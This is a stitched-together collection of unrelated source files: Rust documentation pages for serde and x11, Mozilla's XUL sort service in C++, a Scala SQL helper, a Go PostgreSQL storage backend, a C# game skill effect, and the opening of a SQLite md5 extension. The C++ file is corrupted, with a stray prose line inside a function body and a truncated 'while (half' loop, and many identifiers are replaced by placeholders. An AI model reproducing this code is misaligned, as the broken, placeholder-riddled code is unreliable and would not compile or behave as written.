<h4 id='method.visit_str' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_str' class='fnname'>visit_str</a><E>(&mut self, _v: &<a href='../../../std/primitive.str.html'>str</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_string' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_string' class='fnname'>visit_string</a><E>(&mut self, v: <a class='struct' href='../../../collections/string/struct.String.html' title='collections::string::String'>String</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_unit' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_unit' class='fnname'>visit_unit</a><E>(&mut self) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_unit_struct' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_unit_struct' class='fnname'>visit_unit_struct</a><E>(&mut self, _name: &'static <a href='../../../std/primitive.str.html'>str</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_none' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_none' class='fnname'>visit_none</a><E>(&mut self) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_some' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_some' class='fnname'>visit_some</a><D>(&mut self, _deserializer: &mut D) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, D::Error> <span class='where'>where D: <a class='trait' href='../../../serde/de/trait.Deserializer.html' title='serde::de::Deserializer'>Deserializer</a></span></code></h4>
<h4 id='method.<API key>' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.<API key>' class='fnname'><API key></a><D>(&mut self, _deserializer: &mut D) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, D::Error> <span class='where'>where D: <a class='trait' href='../../../serde/de/trait.Deserializer.html' title='serde::de::Deserializer'>Deserializer</a></span></code></h4>
<h4 id='method.visit_map' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_map' class='fnname'>visit_map</a><V>(&mut self, _visitor: V) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, V::Error> <span class='where'>where V: <a class='trait' href='../../../serde/de/trait.MapVisitor.html' title='serde::de::MapVisitor'>MapVisitor</a></span></code></h4>
<h4 id='method.visit_bytes' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_bytes' class='fnname'>visit_bytes</a><E>(&mut self, _v: <a href='../../../std/primitive.slice.html'>&[</a><a href='../../../std/primitive.u8.html'>u8</a><a href='../../../std/primitive.slice.html'>]</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_byte_buf' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_byte_buf' class='fnname'>visit_byte_buf</a><E>(&mut self, v: <a class='struct' href='../../../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../../../std/primitive.u8.html'>u8</a>>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
</div></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "serde";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XtRemoveActionHook` fn in crate `x11`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XtRemoveActionHook">
<title>x11::xt::XtRemoveActionHook - Rust</title>
<link rel="stylesheet" type="text/css" href="../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<nav class="sidebar">
<p class='location'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>xt</a></p><script>window.sidebarCurrent = {name: 'XtRemoveActionHook', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>xt</a>::<wbr><a class='fn' href=''>XtRemoveActionHook</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-18939' class='srclink' href='../../src/x11/link.rs.html#14' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub unsafe extern fn XtRemoveActionHook(_1: <a class='primitive' href='../../std/primitive.pointer.html'>*mut </a><a class='enum' href='../../std/os/raw/enum.c_void.html' title='std::os::raw::c_void'>c_void</a>)</pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../";
window.currentCrate = "x11";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script defer src="../../search-index.js"></script>
</body>
</html> |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/*
This file provides the implementation for the sort service manager.
*/
#include "nsCOMPtr.h"
#include "nsIContent.h"
#include "nsIDOMElement.h"
#include "nsIDOMNode.h"
#include "nsIServiceManager.h"
#include "nsGkAtoms.h"
#include "nsNameSpaceManager.h"
#include "nsXULContentUtils.h"
#include "nsString.h"
#include "nsQuickSort.h"
#include "<API key>.h"
#include "nsXULSortService.h"
#include "nsIDOMXULElement.h"
#include "<API key>.h"
#include "nsTemplateMatch.h"
#include "nsICollation.h"
#include "nsUnicharUtils.h"
NS_IMPL_ISUPPORTS(XULSortServiceImpl, nsIXULSortService)
void
XULSortServiceImpl::SetSortHints(nsIContent *aNode, nsSortState* aSortState)
{
// set sort and sortDirection attributes when is sort is done
aNode->SetAttr(kNameSpaceID_None, nsGkAtoms::sort,
aSortState->sort, true);
nsAutoString direction;
if (aSortState->direction == <API key>)
direction.AssignLiteral("descending");
else if (aSortState->direction == <API key>)
direction.AssignLiteral("ascending");
aNode->SetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
direction, true);
// for trees, also set the sort info on the currently sorted column
if (aNode->NodeInfo()->Equals(nsGkAtoms::tree, kNameSpaceID_XUL)) {
if (aSortState->sortKeys.Count() >= 1) {
nsAutoString sortkey;
aSortState->sortKeys[0]->ToString(sortkey);
SetSortColumnHints(aNode, sortkey, direction);
}
}
}
void
XULSortServiceImpl::SetSortColumnHints(nsIContent *content,
const nsAString &sortResource,
const nsAString &sortDirection)
{
// set sort info on current column. This ensures that the
// column header sort indicator is updated properly.
for (nsIContent* child = content->GetFirstChild();
child;
child = child->GetNextSibling()) {
if (child->IsXULElement(nsGkAtoms::treecols)) {
SetSortColumnHints(child, sortResource, sortDirection);
} else if (child->IsXULElement(nsGkAtoms::treecol)) {
nsAutoString value;
child->GetAttr(kNameSpaceID_None, nsGkAtoms::sort, value);
// also check the resource attribute for older code
if (value.IsEmpty())
child->GetAttr(kNameSpaceID_None, nsGkAtoms::resource, value);
if (value == sortResource) {
child->SetAttr(kNameSpaceID_None, nsGkAtoms::sortActive,
NS_LITERAL_STRING("true"), true);
child->SetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
sortDirection, true);
// Note: don't break out of loop; want to set/unset
// attribs on ALL sort columns
} else if (!value.IsEmpty()) {
child->UnsetAttr(kNameSpaceID_None, nsGkAtoms::sortActive,
true);
child->UnsetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
true);
}
}
}
}
nsresult
XULSortServiceImpl::GetItemsToSort(nsIContent *aContainer,
nsSortState* aSortState,
nsTArray<contentSortInfo>& aSortItems)
{
// if there is a template attached to the sort node, use the builder to get
// the items to be sorted
nsCOMPtr<nsIDOMXULElement> element = do_QueryInterface(aContainer);
if (element) {
nsCOMPtr<<API key>> builder;
element->GetBuilder(getter_AddRefs(builder));
if (builder) {
nsresult rv = builder->GetQueryProcessor(getter_AddRefs(aSortState->processor));
if (NS_FAILED(rv) || !aSortState->processor)
return rv;
return <API key>(aContainer, builder, aSortState, aSortItems);
}
}
// if there is no template builder, just get the children. For trees,
// get the treechildren element as use that as the parent
nsCOMPtr<nsIContent> treechildren;
if (aContainer->NodeInfo()->Equals(nsGkAtoms::tree, kNameSpaceID_XUL)) {
nsXULContentUtils::FindChildByTag(aContainer,
kNameSpaceID_XUL,
nsGkAtoms::treechildren,
getter_AddRefs(treechildren));
if (!treechildren)
return NS_OK;
aContainer = treechildren;
}
for (nsIContent* child = aContainer->GetFirstChild();
child;
child = child->GetNextSibling()) {
contentSortInfo* cinfo = aSortItems.AppendElement();
if (!cinfo)
return <API key>;
cinfo->content = child;
}
return NS_OK;
}
nsresult
XULSortServiceImpl::<API key>(nsIContent* aContainer,
<API key>* aBuilder,
nsSortState* aSortState,
nsTArray<contentSortInfo>& aSortItems)
{
for (nsIContent* child = aContainer->GetFirstChild();
child;
child = child->GetNextSibling()) {
nsCOMPtr<nsIDOMElement> childnode = do_QueryInterface(child);
nsCOMPtr<<API key>> result;
nsresult rv = aBuilder->GetResultForContent(childnode, getter_AddRefs(result));
NS_ENSURE_SUCCESS(rv, rv);
if (result) {
contentSortInfo* cinfo = aSortItems.AppendElement();
if (!cinfo)
return <API key>;
cinfo->content = child;
cinfo->result = result;
}
else if (!aContainer->IsXULElement(nsGkAtoms::_template)) {
rv = <API key>(child, aBuilder, aSortState, aSortItems);
NS_ENSURE_SUCCESS(rv, rv);
}
}
return NS_OK;
}
int
testSortCallback(const void *data1, const void *data2, void *privateData)
{
Note: testSortCallback is a small C callback stub for NS_QuickSort
contentSortInfo *left = (contentSortInfo *)data1;
contentSortInfo *right = (contentSortInfo *)data2;
nsSortState* sortState = (nsSortState *)privateData;
int32_t sortOrder = 0;
if (sortState->direction == nsSortState_natural && sortState->processor) {
// sort in natural order
sortState->processor->CompareResults(left->result, right->result,
nullptr, sortState->sortHints, &sortOrder);
}
else {
int32_t length = sortState->sortKeys.Count();
for (int32_t t = 0; t < length; t++) {
// for templates, use the query processor to do sorting
if (sortState->processor) {
sortState->processor->CompareResults(left->result, right->result,
sortState->sortKeys[t],
sortState->sortHints, &sortOrder);
if (sortOrder)
break;
}
else {
// no template, so just compare attributes. Ignore namespaces for now.
nsAutoString leftstr, rightstr;
left->content->GetAttr(kNameSpaceID_None, sortState->sortKeys[t], leftstr);
right->content->GetAttr(kNameSpaceID_None, sortState->sortKeys[t], rightstr);
sortOrder = XULSortServiceImpl::CompareValues(leftstr, rightstr, sortState->sortHints);
}
}
}
if (sortState->direction == <API key>)
sortOrder = -sortOrder;
return sortOrder;
}
nsresult
XULSortServiceImpl::SortContainer(nsIContent *aContainer, nsSortState* aSortState)
{
nsTArray<contentSortInfo> items;
nsresult rv = GetItemsToSort(aContainer, aSortState, items);
NS_ENSURE_SUCCESS(rv, rv);
uint32_t numResults = items.Length();
if (!numResults)
return NS_OK;
uint32_t i;
// <API key> sorts the items between separators independently
if (aSortState-><API key>) {
uint32_t startIndex = 0;
for (i = 0; i < numResults; i++) {
if (i > startIndex + 1) {
nsAutoString type;
items[i].result->GetType(type);
if (type.EqualsLiteral("separator")) {
if (aSortState->invertSort)
InvertSortInfo(items, startIndex, i - startIndex);
else
NS_QuickSort((void *)(items.Elements() + startIndex), i - startIndex,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
startIndex = i + 1;
}
}
}
if (i > startIndex + 1) {
if (aSortState->invertSort)
InvertSortInfo(items, startIndex, i - startIndex);
else
NS_QuickSort((void *)(items.Elements() + startIndex), i - startIndex,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
}
} else {
// if the items are just being inverted, that is, just switching between
// ascending and descending, just reverse the list.
if (aSortState->invertSort)
InvertSortInfo(items, 0, numResults);
else
NS_QuickSort((void *)items.Elements(), numResults,
sizeof(contentSortInfo), testSortCallback, (void*)aSortState);
}
// first remove the items from the old positions
for (i = 0; i < numResults; i++) {
nsIContent* child = items[i].content;
nsIContent* parent = child->GetParent();
if (parent) {
// remember the parent so that it can be reinserted back
// into the same parent. This is necessary as multiple rules
// may generate results which get placed in different locations.
items[i].parent = parent;
int32_t index = parent->IndexOf(child);
parent->RemoveChildAt(index, true);
}
}
// now add the items back in sorted order
for (i = 0; i < numResults; i++)
{
nsIContent* child = items[i].content;
nsIContent* parent = items[i].parent;
if (parent) {
parent->AppendChildTo(child, true);
// if it's a container in a tree or menu, find its children,
// and sort those also
if (!child->AttrValueIs(kNameSpaceID_None, nsGkAtoms::container,
nsGkAtoms::_true, eCaseMatters))
continue;
for (nsIContent* grandchild = child->GetFirstChild();
grandchild;
grandchild = grandchild->GetNextSibling()) {
mozilla::dom::NodeInfo *ni = grandchild->NodeInfo();
nsIAtom *localName = ni->NameAtom();
if (ni->NamespaceID() == kNameSpaceID_XUL &&
(localName == nsGkAtoms::treechildren ||
localName == nsGkAtoms::menupopup)) {
SortContainer(grandchild, aSortState);
}
}
}
}
return NS_OK;
}
nsresult
XULSortServiceImpl::InvertSortInfo(nsTArray<contentSortInfo>& aData,
int32_t aStart, int32_t aNumItems)
{
if (aNumItems > 1) {
// reverse the items in the array starting from aStart
int32_t upPoint = (aNumItems + 1) / 2 + aStart;
int32_t downPoint = (aNumItems - 2) / 2 + aStart;
int32_t half = aNumItems / 2;
while (half
aData[downPoint--].swap(aData[upPoint++]);
}
}
return NS_OK;
}
nsresult
XULSortServiceImpl::InitializeSortState(nsIContent* aRootElement,
nsIContent* aContainer,
const nsAString& aSortKey,
const nsAString& aSortHints,
nsSortState* aSortState)
{
// used as an optimization for the content builder
if (aContainer != aSortState->lastContainer.get()) {
aSortState->lastContainer = aContainer;
aSortState->lastWasFirst = false;
aSortState->lastWasLast = false;
}
// The attributes allowed are either:
// sort="key1 key2 ..."
// or sortResource="key1" sortResource2="key2"
// The latter is for backwards compatibility, and is equivalent to concatenating
// both values in the sort attribute
nsAutoString sort(aSortKey);
aSortState->sortKeys.Clear();
if (sort.IsEmpty()) {
nsAutoString sortResource, sortResource2;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortResource, sortResource);
if (!sortResource.IsEmpty()) {
nsCOMPtr<nsIAtom> sortkeyatom = NS_Atomize(sortResource);
aSortState->sortKeys.AppendObject(sortkeyatom);
sort.Append(sortResource);
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortResource2, sortResource2);
if (!sortResource2.IsEmpty()) {
nsCOMPtr<nsIAtom> sortkeyatom2 = NS_Atomize(sortResource2);
aSortState->sortKeys.AppendObject(sortkeyatom2);
sort.Append(' ');
sort.Append(sortResource2);
}
}
}
else {
<API key> tokenizer(sort);
while (tokenizer.hasMoreTokens()) {
nsCOMPtr<nsIAtom> keyatom = NS_Atomize(tokenizer.nextToken());
NS_ENSURE_TRUE(keyatom, <API key>);
aSortState->sortKeys.AppendObject(keyatom);
}
}
aSortState->sort.Assign(sort);
aSortState->direction = nsSortState_natural;
bool noNaturalState = false;
<API key> tokenizer(aSortHints);
while (tokenizer.hasMoreTokens()) {
const <API key>& token(tokenizer.nextToken());
if (token.EqualsLiteral("comparecase"))
aSortState->sortHints |= nsIXULSortService::SORT_COMPARECASE;
else if (token.EqualsLiteral("integer"))
aSortState->sortHints |= nsIXULSortService::SORT_INTEGER;
else if (token.EqualsLiteral("descending"))
aSortState->direction = <API key>;
else if (token.EqualsLiteral("ascending"))
aSortState->direction = <API key>;
else if (token.EqualsLiteral("twostate"))
noNaturalState = true;
}
// if the twostate flag was set, the natural order is skipped and only
// ascending and descending are allowed
if (aSortState->direction == nsSortState_natural && noNaturalState) {
aSortState->direction = <API key>;
}
// set up sort order info
aSortState->invertSort = false;
nsAutoString existingsort;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sort, existingsort);
nsAutoString <API key>;
aRootElement->GetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection, <API key>);
// if just switching direction, set the invertSort flag
if (sort.Equals(existingsort)) {
if (aSortState->direction == <API key>) {
if (<API key>.EqualsLiteral("ascending"))
aSortState->invertSort = true;
}
else if (aSortState->direction == <API key> &&
<API key>.EqualsLiteral("descending")) {
aSortState->invertSort = true;
}
}
// sort items between separators independently
aSortState-><API key> =
aRootElement->AttrValueIs(kNameSpaceID_None, nsGkAtoms::sortSeparators,
nsGkAtoms::_true, eCaseMatters);
// sort static content (non template generated nodes) after generated content
aSortState->sortStaticsLast = aRootElement->AttrValueIs(kNameSpaceID_None,
nsGkAtoms::sortStaticsLast,
nsGkAtoms::_true, eCaseMatters);
aSortState->initialized = true;
return NS_OK;
}
int32_t
XULSortServiceImpl::CompareValues(const nsAString& aLeft,
const nsAString& aRight,
uint32_t aSortHints)
{
if (aSortHints & SORT_INTEGER) {
nsresult err;
int32_t leftint = PromiseFlatString(aLeft).ToInteger(&err);
if (NS_SUCCEEDED(err)) {
int32_t rightint = PromiseFlatString(aRight).ToInteger(&err);
if (NS_SUCCEEDED(err)) {
return leftint - rightint;
}
}
// if they aren't integers, just fall through and compare strings
}
if (aSortHints & SORT_COMPARECASE) {
return ::Compare(aLeft, aRight);
}
nsICollation* collation = nsXULContentUtils::GetCollation();
if (collation) {
int32_t result;
collation->CompareString(nsICollation::<API key>,
aLeft, aRight, &result);
return result;
}
return ::Compare(aLeft, aRight, <API key>());
}
NS_IMETHODIMP
XULSortServiceImpl::Sort(nsIDOMNode* aNode,
const nsAString& aSortKey,
const nsAString& aSortHints)
{
// get root content node
nsCOMPtr<nsIContent> sortNode = do_QueryInterface(aNode);
if (!sortNode)
return NS_ERROR_FAILURE;
nsSortState sortState;
nsresult rv = InitializeSortState(sortNode, sortNode,
aSortKey, aSortHints, &sortState);
NS_ENSURE_SUCCESS(rv, rv);
// store sort info in attributes on content
SetSortHints(sortNode, &sortState);
rv = SortContainer(sortNode, &sortState);
sortState.processor = nullptr; // don't hang on to this reference
return rv;
}
nsresult
<API key>(nsIXULSortService** sortService)
{
*sortService = new XULSortServiceImpl();
NS_ADDREF(*sortService);
return NS_OK;
} |
// v. 2.0. If a copy of the MPL was not distributed with this file, You can
package org.truffulatree.h2odb.sql
import java.sql.SQLException
import javax.sql.DataSource
import cats.Show
import cats.data.{NonEmptyList, State, Xor, XorT}
import cats.std.list._
object SQL {
type Exceptions = NonEmptyList[SQLException]
type Result[S, A, B] = XorT[State[S, ?], NonEmptyList[A], B]
type Fun1[S, A, B, C] = B => Result[S, A, C]
type Fun2[S, A, B, C, D] = B => C => Result[S, A, D]
def catchEx[A, B](a: => A)(implicit B: ErrorContext[B]): Xor[NonEmptyList[B], A] =
Xor.catchOnly[SQLException](a).
leftMap(ex => NonEmptyList(B.fromSQLException(ex)))
def withConnection[S, E, A](
dataSource: DataSource)(
fn: ConnectionRef[S, E] => Result[S, E, A])(
implicit EE: ErrorContext[E],
SE: Show[E]):
Result[S, E, A] = {
ConnectionRef[S, E](dataSource) flatMap { conn =>
conn.closeOnCompletion(fn(conn))
}
}
trait ErrorContext[A] {
def fromSQLException(e: SQLException): A
def fromSQLExceptions(
es: NonEmptyList[SQLException]): NonEmptyList[A] =
es map fromSQLException
}
trait Runnable[A] {
protected def apply[S]: State[S, A]
def run: A =
apply[Unit].run(()).value._2
}
} |
package physical
import (
"database/sql"
"fmt"
"strconv"
"strings"
"time"
"github.com/hashicorp/errwrap"
log "github.com/mgutz/logxi/v1"
"github.com/armon/go-metrics"
"github.com/lib/pq"
)
// PostgreSQL Backend is a physical backend that stores data
// within a PostgreSQL database.
type PostgreSQLBackend struct {
table string
client *sql.DB
put_query string
get_query string
delete_query string
list_query string
logger log.Logger
permitPool *PermitPool
}
// <API key> constructs a PostgreSQL backend using the given
// API client, server address, credentials, and database.
func <API key>(conf map[string]string, logger log.Logger) (Backend, error) {
// Get the PostgreSQL credentials to perform read/write operations.
connURL, ok := conf["connection_url"]
if !ok || connURL == "" {
return nil, fmt.Errorf("missing connection_url")
}
unquoted_table, ok := conf["table"]
if !ok {
unquoted_table = "vault_kv_store"
}
quoted_table := pq.QuoteIdentifier(unquoted_table)
maxParStr, ok := conf["max_parallel"]
var maxParInt int
var err error
if ok {
maxParInt, err = strconv.Atoi(maxParStr)
if err != nil {
return nil, errwrap.Wrapf("failed parsing max_parallel parameter: {{err}}", err)
}
if logger.IsDebug() {
logger.Debug("postgres: max_parallel set", "max_parallel", maxParInt)
}
} else {
maxParInt = <API key>
}
// Create PostgreSQL handle for the database.
db, err := sql.Open("postgres", connURL)
if err != nil {
return nil, fmt.Errorf("failed to connect to postgres: %v", err)
}
db.SetMaxOpenConns(maxParInt)
// Determine if we should use an upsert function (versions < 9.5)
var upsert_required bool
<API key> := "SELECT string_to_array(setting, '.')::int[] < '{9,5}' FROM pg_settings WHERE name = 'server_version'"
if err := db.QueryRow(<API key>).Scan(&upsert_required); err != nil {
return nil, fmt.Errorf("failed to check for native upsert: %v", err)
}
// Setup our put strategy based on the presence or absence of a native
// upsert.
var put_query string
if upsert_required {
put_query = "SELECT vault_kv_put($1, $2, $3, $4)"
} else {
put_query = "INSERT INTO " + quoted_table + " VALUES($1, $2, $3, $4)" +
" ON CONFLICT (path, key) DO " +
" UPDATE SET (parent_path, path, key, value) = ($1, $2, $3, $4)"
}
// Setup the backend.
m := &PostgreSQLBackend{
table: quoted_table,
client: db,
put_query: put_query,
get_query: "SELECT value FROM " + quoted_table + " WHERE path = $1 AND key = $2",
delete_query: "DELETE FROM " + quoted_table + " WHERE path = $1 AND key = $2",
list_query: "SELECT key FROM " + quoted_table + " WHERE path = $1" +
"UNION SELECT DISTINCT substring(substr(path, length($1)+1) from '^.*?/') FROM " +
quoted_table + " WHERE parent_path LIKE $1 || '%'",
logger: logger,
permitPool: NewPermitPool(maxParInt),
}
return m, nil
}
// splitKey is a helper to split a full path key into individual
// parts: parentPath, path, key
func (m *PostgreSQLBackend) splitKey(fullPath string) (string, string, string) {
var parentPath string
var path string
pieces := strings.Split(fullPath, "/")
depth := len(pieces)
key := pieces[depth-1]
if depth == 1 {
parentPath = ""
path = "/"
} else if depth == 2 {
parentPath = "/"
path = "/" + pieces[0] + "/"
} else {
parentPath = "/" + strings.Join(pieces[:depth-2], "/") + "/"
path = "/" + strings.Join(pieces[:depth-1], "/") + "/"
}
return parentPath, path, key
}
// Put is used to insert or update an entry.
func (m *PostgreSQLBackend) Put(entry *Entry) error {
defer metrics.MeasureSince([]string{"postgres", "put"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
parentPath, path, key := m.splitKey(entry.Key)
_, err := m.client.Exec(m.put_query, parentPath, path, key, entry.Value)
if err != nil {
return err
}
return nil
}
// Get is used to fetch and entry.
func (m *PostgreSQLBackend) Get(fullPath string) (*Entry, error) {
defer metrics.MeasureSince([]string{"postgres", "get"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
_, path, key := m.splitKey(fullPath)
var result []byte
err := m.client.QueryRow(m.get_query, path, key).Scan(&result)
if err == sql.ErrNoRows {
return nil, nil
}
if err != nil {
return nil, err
}
ent := &Entry{
Key: key,
Value: result,
}
return ent, nil
}
// Delete is used to permanently delete an entry
func (m *PostgreSQLBackend) Delete(fullPath string) error {
defer metrics.MeasureSince([]string{"postgres", "delete"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
_, path, key := m.splitKey(fullPath)
_, err := m.client.Exec(m.delete_query, path, key)
if err != nil {
return err
}
return nil
}
// List is used to list all the keys under a given
// prefix, up to the next prefix.
func (m *PostgreSQLBackend) List(prefix string) ([]string, error) {
defer metrics.MeasureSince([]string{"postgres", "list"}, time.Now())
m.permitPool.Acquire()
defer m.permitPool.Release()
rows, err := m.client.Query(m.list_query, "/"+prefix)
if err != nil {
return nil, err
}
defer rows.Close()
var keys []string
for rows.Next() {
var key string
err = rows.Scan(&key)
if err != nil {
return nil, fmt.Errorf("failed to scan rows: %v", err)
}
keys = append(keys, key)
}
return keys, nil
} |
using L2dotNET.GameService.Model.Player;
using L2dotNET.GameService.Network.Serverpackets;
using L2dotNET.GameService.World;
using L2dotNET.Utility;
namespace L2dotNET.GameService.Model.Skills2.Effects
{
class ATeleRegion : Effect
{
private string _region;
public override void Build(string str)
{
_region = str.Split(' ')[1];
}
public override EffectResult OnStart(L2Character caster, L2Character target)
{
int[] loc = null;
if (_region.EqualsIgnoreCase("hideout"))
{
L2Player player = (L2Player)target;
if ((player.ClanId > 0) && (player.Clan.HideoutId > 0))
loc = player.Clan.Hideout.ownerLoc;
}
//if (loc == null) //ELFOC
// loc = MapRegionTable.getInstance().getRespawn(target.X, target.Y, ((L2Player)target).Karma);
if (loc != null)
target.Teleport(loc[0], loc[1], loc[2]);
return Nothing;
}
public override bool CanUse(L2Character caster)
{
L2Player player = (L2Player)caster;
if (!player.IsWard())
return true;
caster.SendSystemMessage(SystemMessage.SystemMessageId.<API key>);
return false;
}
}
} |
/*
Maintained by Alexey Pechnikov (pechnikov@mobigroup.ru) and tested on linux only.
The code is public domain.
gcc -lm -fPIC -shared md5.c -o libsqlitemd5.so
.load './libsqlitemd5.so'
create table t1(x);
insert into t1 values (1);
insert into t1 values (2);
insert into t1 values (3);
select hex(group_md5(x)) from t1;
=> <API key>
select hex(md5(''));
=> <API key>
select hex(md5file('/tmp/agent_callbuilder.tcl'));
=> <API key>
*/
#if !defined(SQLITE_CORE) || defined(SQLITE_ENABLE_MD5)
#include <stdio.h>
#include <string.h>
#ifndef SQLITE_CORE
#include "sqlite3ext.h"
<API key>
#else
#include "sqlite3.h"
#endif
/*
* If compiled on a machine that doesn't have a 32-bit integer,
